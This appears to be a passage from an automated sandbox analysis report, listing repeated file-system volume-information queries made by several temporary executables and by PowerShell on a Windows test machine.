Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe	Queries volume information: C:\Users\user\AppData\Local\SystemData\system.dat VolumeInformation
